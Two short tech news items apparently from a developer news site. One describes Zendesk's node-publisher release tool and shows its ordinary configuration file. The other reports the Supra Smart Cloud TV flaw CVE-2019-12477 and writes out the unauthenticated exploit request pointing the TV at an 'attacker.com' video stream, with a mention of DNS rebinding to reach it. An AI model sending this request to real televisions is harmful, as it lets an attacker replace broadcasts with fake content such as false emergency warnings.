Zendesk to Release Node Publisher

Node publisher is designed to help developers to build Node package properly
07 December 2018   874

Zendesk developed node publisher, a tool for building Node.js packages with one command.

Often when building a package, developers forget one step or another, test the wrong version, or forget to run tests at all. As a result, packs with errors are added to the Node.js repository. It is noted that node-publisher will build packages automatically, without missing a single step. This allows, among other things, correct dependency management.

Site-publisher combines five consecutive steps:

  1. Preparation: check against the working tree and the current version N.
  2. Testing: running a code analyzer and tests.
  3. Build (optional): code verification with Babel.
  4. Publication.
  5. Post publication: creating a change log.

node-publisher works with several project elements. In particular, it uses a specific git workflow, checks for the presence of a .nvmrc file, and specifies the script names in package.json. When launched, a .release.yml file is created in the project root folder. In this case, the tool will perform only those steps and commands that are present in the configuration file:

rollback: true

prepare:
  - git diff-index --quiet HEAD --
  - git checkout master
  - git pull --rebase
  - '[[ -f .nvmrc ]] && ./node_modules/.bin/check-node-version --node $(cat .nvmrc)'
  - yarn install

test:
  - yarn travis

build:
  - yarn build
  - git diff --staged --quiet || git commit -am "Update build file"

after_publish:
  - git push --follow-tags origin master:master

changelog:
  - ./node_modules/.bin/offline-github-changelog > CHANGELOG.md
  - git add CHANGELOG.md
  - git commit --allow-empty -m "Update changelog"
  - git push origin master:master

 

Supra Smart Cloud TV to be Hacked

Now hacker can replace video being watched with own content
04 June 2019   301

A vulnerability has been identified on the Supra Smart Cloud TV (CVE-2019-12477). It makes possible to replace the transmission currently being watched for the content of the attacker. As an example, the output of a bogus emergency warning is shown.

To attack, just send a specially designed network request that does not require authentication. In particular, hacker can contact the handler "/ remote / media_control? Action = setUri & uri =" by specifying the URL of the m3u8 file with the video parameters, for example "http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker .com / fake_broadcast_message.m3u8 ".

In most cases, access to the IP address of the TV is limited to the internal network, but since the request is sent via HTTP, it is possible to use methods to access internal resources when the user opens a specially designed external page (for example, under the request of a picture or using the DNS rebinding method).